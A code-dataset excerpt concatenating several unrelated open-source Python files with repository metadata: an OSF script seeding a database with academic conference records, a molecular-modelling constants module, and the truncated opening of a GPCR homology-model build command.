logging.info(metrics.confusion_matrix(y_true, tweaked_test_y)) if __name__ == '__main__': app.run(main)
deepmind/deepmind-research
counterfactual_fairness/adult_pscf.py
Python
apache-2.0
23,095
[ "Gaussian" ]
9507a1daaad4f2f0b052187f7f693d5dd96deb304e493dc462abaf91e8676ce7
#!/usr/bin/env python # encoding: utf-8 import os import sys from modularodm import Q from modularodm.exceptions import ModularOdmException from framework.auth.core import User from website import settings from website.app import init_app from website.conferences.model import Conference from datetime import datetime def main(): init_app(set_backends=True, routes=False) dev = 'dev' in sys.argv populate_conferences(dev=dev) MEETING_DATA = { 'spsp2014': { 'name': 'Society for Personality and Social Psychology 2014', 'info_url': None, 'logo_url': None, 'location': 'Austin, TX', 'start_date': 'Feb 13 2014', 'end_date': 'Feb 15 2014', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'asb2014': { 'name': 'Association of Southeastern Biologists 2014', 'info_url': 'http://www.sebiologists.org/meetings/talks_posters.html', 'logo_url': None, 'location': 'Spartanburg, SC', 'start_date': 'Apr 2 2014', 'end_date': 'Apr 4 2014', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'aps2014': { 'name': 'Association for Psychological Science 2014', 'info_url': 'http://centerforopenscience.org/aps/', 'logo_url': '/static/img/2014_Convention_banner-with-APS_700px.jpg', 'location': 'San Franscisco, CA', 'start_date': 'May 22 2014', 'end_date': 'May 25 2014', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'annopeer2014': { 'name': '#annopeer', 'info_url': None, 'logo_url': None, 'location': None, 'start_date': None, 'end_date': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'cpa2014': { 'name': 'Canadian Psychological Association 2014', 'info_url': None, 'logo_url': None, 'location': 'Vancouver, BC', 'start_date': 'Jun 05 2014', 'end_date': 'Jun 07 2014', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'filaments2014': { 'name': 'National Radio Astronomy Observatory Filaments 2014', 'info_url': None, 'logo_url': 'https://science.nrao.edu/science/meetings/2014/' 'filamentary-structure/images/filaments2014_660x178.png', 'location': 'Charlottesville, VA', 'start_date': 'Oct 10 2014', 'end_date': 'Oct 11 2014', 'active': False, 'admins': [ 'lvonschi@nrao.edu', # 'Dkim@nrao.edu', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'bitss2014': { 'name': 'Berkeley Initiative for Transparency in the Social Sciences Research Transparency Forum 2014', 'info_url': None, 'logo_url': os.path.join( settings.STATIC_URL_PATH, 'img', 'conferences', 'bitss.jpg', ), 'location': 'Berkeley, CA', 'start_date': 'Dec 11 2014', 'end_date': 'Dec 12 2014', 'active': False, 'admins': [ 'gkroll@berkeley.edu', 'awais@berkeley.edu', ], 'public_projects': True, 'poster': False, 'talk': True, }, 'spsp2015': { 'name': 'Society for Personality and Social Psychology 2015', 'info_url': None, 'logo_url': None, 'location': 'Long Beach, CA', 'start_date': 'Feb 26 2015', 'end_date': 'Feb 28 2015', 'active': False, 'admins': [ 'meetings@spsp.org', ], 'poster': True, 'talk': True, }, 'aps2015': { 'name': 'Association for Psychological Science 2015', 'info_url': None, 'logo_url': 'http://www.psychologicalscience.org/images/APS_2015_Banner_990x157.jpg', 'location': 'New York, NY', 'start_date': 'May 21 2015', 'end_date': 'May 24 2015', 'admins': [], 'active': False, 'public_projects': True, 'poster': True, 'talk': True, }, 'icps2015': { 'name': 'International Convention of Psychological Science 2015', 'info_url': None, 'logo_url': 'http://icps.psychologicalscience.org/wp-content/themes/deepblue/images/ICPS_Website-header_990px.jpg', 'location': 'Amsterdam, The Netherlands', 'start_date': 'Mar 12 2015', 'end_date': 'Mar 14 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'mpa2015': { 'name': 'Midwestern Psychological Association 2015', 'info_url': None, 'logo_url': 'http://www.midwesternpsych.org/resources/Pictures/MPA%20logo.jpg', 'location': 'Chicago, IL', 'start_date': 'Apr 30 2015', 'end_date': 'May 02 2015', 'active': False, 'admins': [ 'mpa@kent.edu', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'NCCC2015': { 'name': 'North Carolina Cognition Conference 2015', 'info_url': None, 'logo_url': None, 'location': 'Elon, NC', 'start_date': 'Feb 21 2015', 'end_date': 'Feb 21 2015', 'active': False, 'admins': [ 'aoverman@elon.edu', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'VPRSF2015': { 'name': 'Virginia Piedmont Regional Science Fair 2015', 'info_url': None, 'logo_url': 'http://vprsf.org/wp-content/themes/VPRSF/images/logo.png', 'location': 'Charlottesville, VA', 'start_date': 'Mar 17 2015', 'end_date': 'Mar 17 2015', 'active': False, 'admins': [ 'director@vprsf.org', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'APRS2015': { 'name': 'UVA Annual Postdoctoral Research Symposium 2015', 'info_url': None, 'logo_url': 'http://s1.postimg.org/50qj9u6i7/GPA_Logo.jpg', 'location': 'Charlottesville, VA', 'start_date': None, 'end_date': None, 'active': False, 'admins': [ 'mhurst@virginia.edu', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'ASB2015': { 'name': 'Association of Southeastern Biologists 2015', 'info_url': None, 'logo_url': 'http://www.sebiologists.org/wp/wp-content/uploads/2014/09/banner_image_Large.png', 'location': 'Chattanooga, TN', 'start_date': 'Apr 01 2015', 'end_date': 'Apr 04 2015', 'active': False, 'admins': [ 'amorris.mtsu@gmail.com', ], 'public_projects': True, 'poster': True, 'talk': True, }, 'TeaP2015': { 'name': 'Tagung experimentell arbeitender Psychologen 2015', 'info_url': None, 'logo_url': None, 'location': 'Hildesheim, Germany', 'start_date': 'Mar 08 2015', 'end_date': 'Mar 11 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'VSSEF2015': { 'name': 'Virginia State Science and Engineering Fair 2015', 'info_url': 'http://www.vmi.edu/conferences/vssef/vssef_home/', 'logo_url': 'http://www.vmi.edu/uploadedImages/Images/Headers/vssef4.jpg', 'location': 'Lexington, VA', 'start_date': 'Mar 27 2015', 'end_date': 'Mar 28 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'RMPA2015': { 'name': 'Rocky Mountain Psychological Association 2015', 'info_url': 'http://www.rockymountainpsych.org/uploads/7/4/2/6/7426961/85th_annual_rmpa_conference_program_hr.pdf', 'logo_url': 'http://www.rockymountainpsych.org/uploads/7/4/2/6/7426961/header_images/1397234084.jpg', 'location': 'Boise, Idaho', 'start_date': 'Apr 09 2015', 'end_date': 'Apr 11 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ARP2015': { 'name': 'Association for Research in Personality 2015', 'info_url': 'http://www.personality-arp.org/conference/', 'logo_url': 'http://www.personality-arp.org/wp-content/uploads/conference/st-louis-arp.jpg', 'location': 'St. Louis, MO', 'start_date': 'Jun 11 2015', 'end_date': 'Jun 13 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'SEP2015': { 'name': 'Society of Experimental Psychologists Meeting 2015', 'info_url': 'http://faculty.virginia.edu/Society_of_Experimental_Psychologists/', 'logo_url': 'http://www.sepsych.org/nav/images/SEP-header.gif', 'location': 'Charlottesville, VA', 'start_date': 'Apr 17 2015', 'end_date': 'Apr 18 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'Reid2015': { 'name': 'L. Starling Reid Undergraduate Psychology Conference 2015', 'info_url': 'http://avillage.web.virginia.edu/Psych/Conference', 'location': 'Charlottesville, VA', 'start_date': 'Apr 17 2015', 'end_date': 'Apr 17 2015', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'NEEPS2015': { 'name': 'Northeastern Evolutionary Psychology Conference 2015', 'info_url': 'http://neeps2015.weebly.com/', 'location': 'Boston, MA', 'start_date': 'Apr 09 2015', 'end_date': 'Apr 11 2015', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'VaACS2015': { 'name': 'Virginia Section American Chemical Society Student Poster Session 2015', 'info_url': 'http://virginia.sites.acs.org/', 'logo_url': 'http://virginia.sites.acs.org/Bulletin/15/UVA.jpg', 'location': 'Charlottesville, VA', 'start_date': 'Apr 17 2015', 'end_date': 'Apr 17 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'MADSSCi2015': { 'name': 'Mid-Atlantic Directors and Staff of Scientific Cores & Southeastern Association of Shared Services 2015', 'info_url': 'http://madssci.abrf.org', 'logo_url': 'http://s24.postimg.org/qtc3baefp/2015madssci_seasr.png', 'location': 'Charlottesville, VA', 'start_date': 'Jun 03 2015', 'end_date': 'Jun 5 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'NRAO2015': { 'name': 'National Radio Astronomy Observatory Accretion 2015', 'info_url': 'https://science.nrao.edu/science/meetings/2015/accretion2015/posters', 'location': 'Charlottesville, VA', 'start_date': 'Oct 09 2015', 'end_date': 'Oct 10 2015', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ARCS2015': { 'name': 'Advancing Research Communication and Scholarship 2015', 'info_url': 'http://commons.pacificu.edu/arcs/', 'logo_url': 'http://commons.pacificu.edu/assets/md5images/4dfd167454e9f4745360a9550e189323.png', 'location': 'Philadelphia, PA', 'start_date': 'Apr 26 2015', 'end_date': 'Apr 28 2015', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'singlecasedesigns2015': { 'name': 'Single Case Designs in Clinical Psychology: Uniting Research and Practice', 'info_url': 'https://www.royalholloway.ac.uk/psychology/events/eventsarticles/singlecasedesignsinclinicalpsychologyunitingresearchandpractice.aspx', 'logo_url': None, 'location': 'London, UK', 'start_date': 'Apr 17 2015', 'end_date': 'Apr 17 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'OSFM2015': { 'name': 'OSF for Meetings 2015', 'info_url': None, 'logo_url': None, 'location': 'Charlottesville, VA', 'start_date': None, 'end_date': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'JSSP2015': { 'name': 'Japanese Society of Social Psychology 2015', 'info_url': 'http://www.socialpsychology.jp/conf2015/index.html', 'logo_url': None, 'location': 'Tokyo, Japan', 'start_date': 'Oct 31 2015', 'end_date': 'Nov 01 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, '4S2015': { 'name': 'Society for Social Studies of Science 2015', 'info_url': 'http://www.4sonline.org/meeting', 'logo_url': 'http://www.4sonline.org/ee/denver-skyline.jpg', 'location': 'Denver, CO', 'start_date': 'Nov 11 2015', 'end_date': 'Nov 14 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'IARR2016': { 'name': 'International Association for Relationship Research 2016', 'info_url': 'http://iarr.psych.utoronto.ca/', 'logo_url': None, 'location': 'Toronto, Canada', 'start_date': 'Jul 20 2016', 'end_date': 'Jul 24 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'IA2015': { 'name': 'Inclusive Astronomy 2015', 'info_url': 'https://vanderbilt.irisregistration.com/Home/Site?code=InclusiveAstronomy2015', 'logo_url': 'https://vanderbilt.blob.core.windows.net/images/Inclusive%20Astronomy.jpg', 'location': 'Nashville, TN', 'start_date': 'Jun 17 2015', 'end_date': 'Jun 19 2015', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'R2RC': { 'name': 'Right to Research Coalition', 'info_url': None, 'logo_url': None, 'location': None, 'start_date': None, 'end_date': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'OpenCon2015': { 'name': 'OpenCon2015', 'info_url': 'http://opencon2015.org/', 'logo_url': 'http://s8.postimg.org/w9b30pxyd/Open_Con2015_new_logo.png', 'location': 'Brussels, Belgium', 'start_date': 'Nov 14 2015', 'end_date': 'Nov 16 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ESIP2015': { 'name': 'Earth Science Information Partners 2015', 'info_url': 'http://esipfed.org/', 'logo_url': 'http://s30.postimg.org/m2uz2g4pt/ESIP.png', 'location': None, 'start_date': None, 'end_date': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'SPSP2016': { 'name': 'Society for Personality and Social Psychology 2016 ', 'info_url': 'http://meeting.spsp.org', 'logo_url': None, 'location': 'San Diego, CA', 'start_date': 'Jan 28 2016', 'end_date': 'Jan 30 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'NACIII': { 'name': '2015 National Astronomy Consortium (NAC) III Workshop', 'info_url': 'https://info.nrao.edu/do/odi/meetings/2015/nac111/', 'logo_url': None, 'location': 'Washington, DC', 'start_date': 'Aug 29 2015', 'end_date': 'Aug 30 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'CDS2015': { 'name': 'Cognitive Development Society 2015', 'info_url': 'http://meetings.cogdevsoc.org/', 'logo_url': None, 'location': 'Columbus, OH', 'start_date': 'Oct 09 2015', 'end_date': 'Oct 10 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'SEASR2016': { 'name': 'Southeastern Association of Shared Resources 2016', 'info_url': 'http://seasr.abrf.org', 'logo_url': None, 'location': 'Atlanta, GA', 'start_date': 'Jun 22 2016', 'end_date': 'Jun 24 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'Accretion2015': { 'name': 'Observational Evidence of Gas Accretion onto Galaxies?', 'info_url': 'https://science.nrao.edu/science/meetings/2015/accretion2015', 'logo_url': None, 'location':'Charlottesville, VA', 'start_date':'Oct 09 2015', 'end_date':'Oct 10 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, '2020Futures': { 'name': 'U.S. Radio/Millimeter/Submillimeter Science Futures in the 2020s', 'info_url': 'https://science.nrao.edu/science/meetings/2015/2020futures/home', 'logo_url': None, 'location':'Chicago, IL', 'start_date':'Dec 15 2015', 'end_date':'Dec 17 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'RMPA2016': { 'name': 'Rocky Mountain Psychological Association 2016', 'info_url': 'http://www.rockymountainpsych.org/convention-info.html', 'logo_url': 'http://www.rockymountainpsych.org/uploads/7/4/2/6/7426961/header_images/1397234084.jpg', 'location':'Denver, CO', 'start_date':'Apr 14 2016', 'end_date':'Apr 16 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'CNI2015': { 'name': 'Coalition for Networked Information (CNI) Fall Membership Meeting 2015', 'info_url': 'https://wp.me/P1LncT-64s', 'logo_url': None, 'location':'Washington, DC', 'start_date':'Dec 14 2015', 'end_date':'Dec 16 2015', 'active': True, 'admins': [], 'public_projects': True, 'poster': False, 'talk': True, }, 'SWPA2016': { 'name': 'Southwestern Psychological Association Convention 2016', 'info_url': 'https://www.swpsych.org/conv_dates.php', 'logo_url': 'http://s28.postimg.org/xbwyqqvx9/SWPAlogo4.jpg', 'location':'Dallas, TX', 'start_date':'Apr 08 2016', 'end_date':'Apr 10 2016', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ESIP2016W': { 'name': 'Earth Science Information Partners Winter Meeting 2016', 'info_url': 'http://commons.esipfed.org/2016WinterMeeting', 'logo_url': 'http://s30.postimg.org/m2uz2g4pt/ESIP.png', 'location':'Washington, DC', 'start_date':'Jan 06 2016', 'end_date':'Jan 08 2016', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'MiamiBrainhack15': { 'name': 'University of Miami Brainhack 2015', 'info_url': 'http://brainhack.org/americas/', 'logo_url': None, 'location': None, 'start_date': 'Oct 23 2015', 'end_date': 'Oct 25 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'PsiChiRepository': { 'name': 'Psi Chi', 'location': None, 'start_date': None, 'end_date': None, 'info_url': 'http://www.psichi.org/?ResearchAdvisory#.VmBpeOMrI1g', 'logo_url': 'http://s11.postimg.org/4g2451vcz/Psi_Chi_Logo.png', 'active': True, 'admins': [ 'research.director@psichi.org', ], 'field_names': { 'submission1': 'measures', 'submission2': 'materials', 'submission1_plural': 'measures/scales', 'submission2_plural': 'study materials', 'meeting_title_type': 'Repository', 'add_submission': 'materials', 'mail_subject': 'Title', 'mail_message_body': 'Measure or material short description', 'mail_attachment': 'Your measure/scale or material file(s)' }, }, 'GI2015': { 'name': 'Genome Informatics 2015', 'info_url': 'https://meetings.cshl.edu/meetings.aspx?meet=info&year=15', 'logo_url': None, 'location':'Cold Spring Harbor, NY' , 'start_date': 'Oct 28 2015', 'end_date': 'Oct 31 2015', 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'MADSSCi2016': { 'name': 'Mid-Atlantic Directors and Staff of Scientific Cores & Southeastern Association of Shared Services 2016', 'info_url': 'http://madssci.abrf.org', 'logo_url': 'http://madssci.abrf.org/sites/default/files/madssci-logo-bk.png', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'SMM2015': { 'name': 'The Society for Marine Mammalogy', 'info_url': 'https://www.marinemammalscience.org/conference/', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'TESS': { 'name': 'Time-sharing Experiments for the Social Sciences', 'info_url': 'http://www.tessexperiments.org', 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': False, 'talk': True, 'field_names': { 'submission1': 'poster', 'submission2': 'study', 'submission1_plural': 'posters', 'submission2_plural': 'studies', 'meeting_title_type': 'Studies', 'add_submission': 'studies', } }, 'ASCERM2016': { 'name': 'ASCE Rocky Mountain Student Conference 2016', 'info_url': 'http://luninuxos.com/asce/', 'logo_url': 'http://s2.postimg.org/eaduh2ovt/2016_ASCE_Rocky_Mtn_banner.png', 'active': True, 'admins': [], 'public_projects': True, 'poster': False, 'talk': True, }, 'ARCA2016': { 'name': '5th Applied Research Conference in Africa', 'info_url': 'http://www.arcaconference.org/', 'logo_url': 'http://www.arcaconference.org/images/ARCA_LOGO_NEW.JPG', 'active': True, 'admins': [], 'public_projects': True, 'poster': False, 'talk': True, }, 'CURCONF2016': { 'name': 'CUR Biennial Conference 2016', 'info_url': 'http://www.cur.org/conferences_and_events/biennial2016/', 'logo_url': 'http://s11.postimg.org/v8feuna4y/Conference_logo_eps.jpg', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'CATALISE2016': { 'name': 'Criteria and Terminology Applied to Language Impairments: Synthesising the Evidence (CATALISE) 2016', 'info_url': None, 'logo_url': None, 'active': False, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'Emergy2016': { 'name': '9th Biennial Emergy Research Conference', 'info_url': 'http://www.cep.ees.ufl.edu/emergy/conferences/ERC09_2016/index.shtml', 'logo_url': 'http://s12.postimg.org/uf9ioqmct/emergy.jpg', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'aps2016': { 'name': 'Association for Psychological Science 2016', 'info_url': 'http://www.psychologicalscience.org/convention', 'logo_url': 'http://www.psychologicalscience.org/redesign/wp-content/uploads/2015/03/APS_2016_Banner_990x157.jpg', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'jssp2016': { 'name': 'Japanese Society of Social Psychology 2016', 'info_url': 'http://www.socialpsychology.jp/conf2016/', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'sepech2016': { 'name': 'XI SEPECH - Research Seminar in Human Sciences (Seminário de Pesquisa em Ciências Humanas)', 'info_url': 'http://www.uel.br/eventos/sepech/sepech2016/', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'etmaal2016': { 'name': 'Etmaal van de Communicatiewetenschap 2016 - Media Psychology', 'info_url': 'https://etmaal2016.wordpress.com', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'WSAN2016': { 'name': 'WSAN2016 Erasmus University Rotterdam', 'info_url': 'http://www.humane.eu/wsan/', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'ContainerStrategies': { 'name': 'Container Strategies for Data & Software Preservation', 'info_url': 'https://daspos.crc.nd.edu/index.php/workshops/container-strategies-for-data-software-preservation-that-promote-open-science', 'logo_url': 'http://s17.postimg.org/8nl1v5mxb/Screen_Shot_2016_03_02_at_9_05_24_PM.png', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, }, 'CNI2016': { 'name': 'Coalition for Networked Information (CNI) Spring Membership Meeting 2016', 'info_url': 'https://wp.me/P1LncT-6fd', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': False, 'talk': True, }, 'XGAL2016': { 'name': 'Molecular Gas in Galactic Environments 2016', 'info_url': 'https://science.nrao.edu/science/meetings/2016/molecular-gas-in-galactic-environments/home', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'DLF2016': { 'name': 'Digital Library Federation 2016 DLF Forum', 'info_url': 'https://www.diglib.org/forums/2016forum/', 'logo_url': 'https://www.diglib.org/wp-content/themes/construct/lib/scripts/timthumb/thumb.php?src=https://www.diglib.org/wp-content/uploads/2016/02/DLF-Forum-2016-Slider-Website-1.png&w=580&h=252&zc=1&q=100', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, 'start_date': 'Nov 7 2016', 'end_date': 'Nov 9 2016', 'locztion': 'Milwaukee, Wisconsin', }, 'ESCAN2016': { 'name': 'European Society for Cognitive and Affective Neuroscience (ESCAN) 2016', 'info_url': 'http://congressos.abreu.pt/escan2016/', 'logo_url': 'http://congressos.abreu.pt/escan2016/images/escan-logo.png', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'Reid2016': { 'name': 'L. Starling Reid Undergraduate Psychology Conference 2016', 'info_url': 'http://cacsprd.web.virginia.edu/Psych/Conference', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'CNS2016': { 'name': 'The Cognitive Neuroscience Society (CNS) 2016', 'info_url': 'http://www.cogneurosociety.org/annual-meeting/', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'HEPA2016': { 'name': 'HEPA Europe Annual Meeting 2016', 'info_url': 'http://www.hepaeurope2016.eu/', 'logo_url': None, 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, 'OGH': { 'name': 'Open Global Health', 'info_url': None, 'logo_url': 'http://s33.postimg.org/7tjjpvg4f/Drawing.png', 'active': True, 'admins': [], 'public_projects': True, 'poster': True, 'talk': True, }, } def populate_conferences(dev=False): if dev: Conference.remove() date_format = '%b %d %Y' for meeting, attrs in MEETING_DATA.iteritems(): meeting = meeting.strip() admin_emails = attrs.pop('admins', []) admin_objs = [] if not dev: for email in admin_emails: try: user = User.find_one(Q('username', 'iexact', email)) admin_objs.append(user) except ModularOdmException: raise RuntimeError('Username {0!r} is not registered.'.format(email)) # Convert string into datetime object try: attrs['end_date'] = datetime.strptime(attrs.get('end_date'), date_format) attrs['start_date'] = datetime.strptime(attrs.get('start_date'), date_format) except TypeError: print '** Meeting {} does not have a start or end date. **'.format(meeting) custom_fields = attrs.pop('field_names', {}) conf = Conference( endpoint=meeting, admins=admin_objs, **attrs ) conf.field_names.update(custom_fields) try: conf.save() except ModularOdmException: conf = Conference.find_one(Q('endpoint', 'eq', meeting)) for key, value in attrs.items(): if isinstance(value, dict): current = getattr(conf, key) current.update(value) setattr(conf, key, current) else: setattr(conf, key, value) conf.admins = admin_objs changed_fields = conf.save() if changed_fields: print('Updated {}: {}'.format(meeting, changed_fields)) else: print('Added new Conference: {}'.format(meeting)) if __name__ == '__main__': main()
zamattiac/osf.io
scripts/populate_conferences.py
Python
apache-2.0
32,271
[ "COLUMBUS" ]
cc9efed33d9390137ddd7895974dedee1c2eed14889d15a7928a8da5807b0e05
# -*- coding: utf-8 -*- # MolMod is a collection of molecular modelling tools for python. # Copyright (C) 2007 - 2019 Toon Verstraelen <Toon.Verstraelen@UGent.be>, Center # for Molecular Modeling (CMM), Ghent University, Ghent, Belgium; all rights # reserved unless otherwise stated. # # This file is part of MolMod. # # MolMod is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 3 # of the License, or (at your option) any later version. # # MolMod is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/> # # -- """Some useful physicochemical constants in atomic units These are the physical constants defined in this module (in atomic units): """ boltzmann = 3.1668154051341965e-06 avogadro = 6.0221415e23 lightspeed = 137.03599975303575 planck = 6.2831853071795864769 # automatically spice up the docstrings lines = [ " ================ ==================", " Name Value ", " ================ ==================", ] for key, value in sorted(globals().items()): if not isinstance(value, float): continue lines.append(" %16s %.10e" % (key, value)) lines.append(" ================ ==================") __doc__ += "\n".join(lines)
molmod/molmod
molmod/constants.py
Python
gpl-3.0
1,646
[ "Avogadro" ]
4ec56567745f835a1c6166e9c69ff6e326fd39e7c5d3889ec376e81bcba8621d
from build.management.commands.base_build import Command as BaseBuild from django.db.models import Q from django.conf import settings from protein.models import Protein, ProteinConformation, ProteinAnomaly, ProteinState, ProteinSegment from residue.models import Residue from residue.functions import dgn, ggn from structure.models import * from structure.functions import HSExposureCB, PdbStateIdentifier from common.alignment import AlignedReferenceTemplate, GProteinAlignment from common.definitions import * from common.models import WebLink from signprot.models import SignprotComplex import structure.structural_superposition as sp import structure.assign_generic_numbers_gpcr as as_gn import structure.homology_models_tests as tests import Bio.PDB as PDB from modeller import * from modeller.automodel import * from collections import OrderedDict import os import subprocess import shlex import logging import pprint from io import StringIO import sys import re import zipfile import shutil import math from copy import deepcopy from datetime import datetime, date import yaml import traceback startTime = datetime.now() logger = logging.getLogger('homology_modeling') hdlr = logging.FileHandler('./logs/homology_modeling.log') formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') hdlr.setFormatter(formatter) logger.addHandler(hdlr) logger.setLevel(logging.INFO) build_date = date.today() import warnings warnings.filterwarnings("ignore") class Command(BaseBuild): help = 'Build automated chimeric GPCR homology models' def add_arguments(self, parser): super(Command, self).add_arguments(parser=parser) parser.add_argument('--update', help='Upload model to GPCRdb, overwrites existing entry', default=False, action='store_true') parser.add_argument('-r', help='''Run program for specific receptor(s) by giving UniProt common name as argument (e.g. 5ht2a_human) or build revised crystal by giving PDB code (e.g. 4K5Y)''', default=False, type=str, nargs='+') parser.add_argument('-z', help='Create zip file of model directory containing all built models', default=False, action='store_true') parser.add_argument('-c', help='Select GPCR class (A, B1, B2, C, F)', default=False) parser.add_argument('-x', help='Select crystal structure refinement for all crystals in the db', default=False, action='store_true') parser.add_argument('--purge', help='Purge all existing records', default=False, action='store_true') parser.add_argument('-i', help='Number of MODELLER iterations for model building', default=1, type=int) parser.add_argument('--test_run', action='store_true', help='Build only a test set of homology models ', default=False) parser.add_argument('--debug', help='Debugging mode', default=False, action='store_true') parser.add_argument('--state', help='Specify state in debug mode', default=False, type=str, nargs='+') parser.add_argument('--complex', help='Build GPCR complex', default=False, action='store_true') parser.add_argument('--signprot', help='Specify signaling protein with UniProt name', default=False, type=str) parser.add_argument('--n_c_term', help='Model N- and C-termini', default=False, action='store_true') def handle(self, *args, **options): self.debug = options['debug'] if not os.path.exists('./structure/homology_models/'): os.mkdir('./structure/homology_models') if not os.path.exists('./structure/PIR/'): os.mkdir('./structure/PIR') if not os.path.exists('./static/homology_models'): os.mkdir('./static/homology_models') open('./structure/homology_models/done_models.txt','w').close() if options['update']: self.update = True else: self.update = False if options['complex']: self.complex = True else: self.complex = False if not options['signprot']: self.signprot = False else: self.signprot = options['signprot'] GPCR_class_codes = {'A':'001', 'B1':'002', 'B2':'003', 'C':'004', 'F':'005', 'T':'006'} self.modeller_iterations = options['i'] self.build_all = False # Build all if options['purge']: # if updating all, then delete existing print("Delete existing") StructureModel.objects.all().delete() StructureModelSeqSim.objects.all().delete() StructureModelStatsRotamer.objects.all().delete() if options['r']: all_receptors = Protein.objects.filter(entry_name__in=options['r']) elif options['x']: structs = Structure.objects.filter(refined=False, annotated=True).order_by('pdb_code__index') all_receptors = [i.protein_conformation.protein for i in structs] elif options['c']==False: self.build_all = True all_receptors = Protein.objects.filter(parent__isnull=True, accession__isnull=False, species__common_name='Human').filter(Q(family__slug__istartswith='001') | Q(family__slug__istartswith='002') | Q(family__slug__istartswith='003') | Q(family__slug__istartswith='004') | Q(family__slug__istartswith='005') | Q(family__slug__istartswith='006')).order_by('entry_name') structs = Structure.objects.filter(refined=False, annotated=True).order_by('pdb_code__index') all_receptors = list(all_receptors)+[i.protein_conformation.protein for i in structs] elif options['c'].upper() not in GPCR_class_codes: raise AssertionError('Error: Incorrect class name given. Use argument -c with class name A, B1, B2, C, F or T') # Build one class else: all_receptors = Protein.objects.filter(parent__isnull=True, accession__isnull=False, species__common_name='Human', family__slug__istartswith=GPCR_class_codes[options['c'].upper()]) self.receptor_list = [] # Find proteins and states for which there is no xtal yet for r in all_receptors: if r.accession==None: self.receptor_list.append([r, 